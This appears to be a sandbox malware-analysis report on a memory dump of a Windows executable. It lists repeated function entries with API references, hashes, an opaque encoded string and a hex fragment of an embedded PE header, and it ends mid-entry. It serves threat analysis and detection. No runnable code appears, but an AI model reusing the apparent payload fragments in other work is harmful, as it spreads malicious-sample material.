GetTickCount64.KERNEL32 ref: 0044DBA6
GetTickCount.KERNEL32 ref: 0044DBAE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologTick$AddressCountCount64HandleModuleProc
String ID:
API String ID: 698623096-0
Opcode ID: f71ddca9f2b4d55c87c5a0a4685d5939e81a89c4063a9d63706cac26f20d51d2
Instruction ID: 93337046b72b4f272735c9cdc7ca763423b43e58d840744d40130068c9892647
Opcode Fuzzy Hash: f71ddca9f2b4d55c87c5a0a4685d5939e81a89c4063a9d63706cac26f20d51d2
Instruction Fuzzy Hash: E6F082B1E052489EDB00AFEA99842ADFFB5FB15310F5040AFD90892301C7740A00D675

Uniqueness

Uniqueness Score: -1.00%

Function 0040A24C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040A253

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040A24D, 0040A25A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 687b3498250b4b3cd265e0177af23a6aab75d219ba8e5be336cb74f0288877fe
Instruction ID: 0057e7b996f07cbecae86091c4394cb40fbf005e9b2a5c44e7be6a6a3eddf1eb
Opcode Fuzzy Hash: 687b3498250b4b3cd265e0177af23a6aab75d219ba8e5be336cb74f0288877fe
Instruction Fuzzy Hash: 47C04C529956302D394533693C07DEE068E8D56720B16016FF540A55D35D891C8185FF

Uniqueness

Uniqueness Score: -1.00%

Function 00402213, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040221A

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402214, 00402219, 00402221

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: e523681798c9a12b186af3e0e9c077731f59e9d38d6a90a9287e0175fd7fbe16
Instruction ID: c393f2c3f4ed60259a07d8ef2066c57b9609af5342ce6087124609bbc4b4f2a9
Opcode Fuzzy Hash: e523681798c9a12b186af3e0e9c077731f59e9d38d6a90a9287e0175fd7fbe16
Instruction Fuzzy Hash: 34C04C625996313D394533A57C17DEA024E8D5A720B16007FF540655D25C891C8182FF

Uniqueness

Uniqueness Score: -1.00%

Function 004086C1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004086C8

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 004086C2, 004086C7, 004086CF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200
API String ID: 4000879885-1544901093
Opcode ID: f5b1c617b7745989920faa500e9ad76174b71d2c48108af07f60299306a8df1d
Instruction ID: 38110bd242ea3bfd04d15056785364a972470e7e41aea10792510e1e59a21646
Opcode Fuzzy Hash: f5b1c617b7745989920faa500e9ad76174b71d2c48108af07f60299306a8df1d
Instruction Fuzzy Hash: EEC04C126959212D395933A53C07DEF024E9D96721B16016FFA80AA5D25C892C8581FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040869B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004086A2

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040869C, 004086A1, 004086A9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: fca6202797d233e6ea0fcb1e8831d88f2c5575d3f292bea352e933dd8faaecd7
Instruction ID: 0288b0a33f127923fdc175bcc9e4f226d07a171e5f468928065520b70e5e6145
Opcode Fuzzy Hash: fca6202797d233e6ea0fcb1e8831d88f2c5575d3f292bea352e933dd8faaecd7
Instruction Fuzzy Hash: 2EC04C165956312D3D853355380BDEF024E9D9A720B16017FB940656D26D892C8181FE

Uniqueness

Uniqueness Score: -1.00%

Function 004048E3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004048EA

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 004048E4, 004048E9, 004048F1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 9220e0002a581d653aff76b5544190566559ae670f54430431c9f23285283c5f
Instruction ID: 12941ef5300d5d3ca1d48400a836db727a3aa57d222af7125f71995f6a6bb9da
Opcode Fuzzy Hash: 9220e0002a581d653aff76b5544190566559ae670f54430431c9f23285283c5f
Instruction Fuzzy Hash: 31C04C125966302D3D8532653817EEE025E8D56721F1A006FF544695D25C891C8192FE

Uniqueness

Uniqueness Score: -1.00%

Function 00402ADE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00402AE5

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402ADF, 00402AE4, 00402AEC

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: ae05f7c548689377a2d6d7f8f2e7ee4c22bdb8c54c59ecf83714d23b893bb12f
Instruction ID: 663f77395931ad928d018b832c8a80838be7224243435c2140bfc78c987bc14c
Opcode Fuzzy Hash: ae05f7c548689377a2d6d7f8f2e7ee4c22bdb8c54c59ecf83714d23b893bb12f
Instruction Fuzzy Hash: 11C04C125D56302D39853255380BDEE025E8D56720B16007FFA40655D65C891D8186FF

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040CA8B

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040CA85, 0040CA92

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: c9c208aee870b945193d2fa6de8a963f33eb7be19f4522170437fafb64d92436
Instruction ID: 4ffc46775f5eb4f1bce176144216cd53af0bd79fecfd64caa3f21755272c7365
Opcode Fuzzy Hash: c9c208aee870b945193d2fa6de8a963f33eb7be19f4522170437fafb64d92436
Instruction Fuzzy Hash: 9BC04C225957312D3D8573A57C07DEA124E8D56720B16017FB685655D25C882C8185FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB17, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040AB1E

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040AB18, 0040AB1D, 0040AB25

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: f13516b8040e6d1fdaf50f50785034303a2ae8f19527bba4b273bcb14c5b79c2
Instruction ID: ad4ebcbc0a8346865d7247a4bd0e6c99cbf8780e4a0df1b70d48cffb608485de
Opcode Fuzzy Hash: f13516b8040e6d1fdaf50f50785034303a2ae8f19527bba4b273bcb14c5b79c2
Instruction Fuzzy Hash: E1C04C525957302D394533953907DEA024E8D5A721B1600BFF540655D25C892C8185FE

Uniqueness

Uniqueness Score: -1.00%

Function 00408F66, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00408F6D

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00408F67, 00408F74

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 7a02073844113760bd3054696d06e0255ede8cbefa262497863b0e9c2b95003a
Instruction ID: 25b6a108980f8320795cb07f9d76a86d19351f6e50c10c6e81196ad634ecde63
Opcode Fuzzy Hash: 7a02073844113760bd3054696d06e0255ede8cbefa262497863b0e9c2b95003a
Instruction Fuzzy Hash: BDC04C125A56302E398532A53D07DEA025E8D56720B16016FF545696D25C892C8181FE

Uniqueness

Uniqueness Score: -1.00%

Function 004051D5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004051DC

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 004051D6, 004051DB, 004051E3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 6e81c0106af4914267ecc8bb14011cfa879479261a7b9ecf50526baf08134973
Instruction ID: a72b6a1d3d66b53a737fe09d3f5f2c3c5e8c4145830486a641d466840165291e
Opcode Fuzzy Hash: 6e81c0106af4914267ecc8bb14011cfa879479261a7b9ecf50526baf08134973
Instruction Fuzzy Hash: 44C04C129D56312E394532953807DEE024E9E56720B16006FF544655D35C891D8181FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040D34F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040D356

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040D350, 0040D35D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 81cc667dd1bd3d0e5e7b1d723b34c7542e9f8a7c5dd5b6485e180bd5ba3bdbc7
Instruction ID: 788e81043146d34a204da95c6aaf527042f0c320375d9e9c5808827149d451a4
Opcode Fuzzy Hash: 81cc667dd1bd3d0e5e7b1d723b34c7542e9f8a7c5dd5b6485e180bd5ba3bdbc7
Instruction Fuzzy Hash: 08C04C125956302D394533A53C07DEA128E8D56724B16107FB945655D25C981D8181FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040B3E9

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040B3E3, 0040B3F0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 287a10f866a38993484474b896e245fb5ac035c77e76aa5c9b0832f31c85c810
Instruction ID: 9ea7e63911cbe7384143c5be40584d122255df295a60662729e35affd5050ccb
Opcode Fuzzy Hash: 287a10f866a38993484474b896e245fb5ac035c77e76aa5c9b0832f31c85c810
Instruction Fuzzy Hash: 99C04C525956302D398533553807DEA125E8D96720B16006FF544656D65D891C8185FE

Uniqueness

Uniqueness Score: -1.00%

Function 00403451, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00403458

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403452, 00403457, 0040345F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: cdd77efc6b589c4ffecd6c1c127ac3a30a0c7ee332b8c5a76fdd69e37ec59be7
Instruction ID: e4219eabbc0be6cdcb4523690851dbfc945d72fc796d06143663a067f437321e
Opcode Fuzzy Hash: cdd77efc6b589c4ffecd6c1c127ac3a30a0c7ee332b8c5a76fdd69e37ec59be7
Instruction Fuzzy Hash: 6FC04C1659663029395532593C17DEE024E8D56720B56007FF540A65D35E891C8182FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040180D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401814

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040180E, 00401813, 0040181B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 6f60bc8db37fdd1dfa284c4403e21a1651fda5dd4e79bde9fb01f8a688c14a95
Instruction ID: fd182bead98460bf8a69c0a98c1d47d876b4f272ad37733376e36c40a964e083
Opcode Fuzzy Hash: 6f60bc8db37fdd1dfa284c4403e21a1651fda5dd4e79bde9fb01f8a688c14a95
Instruction Fuzzy Hash: C3C04C525996302D3D4533657817DEA029E9D5A720B16007FF545A65D25C881C8192FE

Uniqueness

Uniqueness Score: -1.00%

Function 00409981, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00409988

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00409982, 0040998F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: bdf3fbc9dc4f86a1ded931f858c25478f5b5dce6870069eb5cff17bc369f8271
Instruction ID: 1b29e55c750c172269f35e3fd5b5890a0a68579d4ef95ad94b1982a3a30d14aa
Opcode Fuzzy Hash: bdf3fbc9dc4f86a1ded931f858c25478f5b5dce6870069eb5cff17bc369f8271
Instruction Fuzzy Hash: 3FC04C12599A702D395532553817DEE024E8D57B20B56007FF650A55D25C891C8181FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF4F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040BF56

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

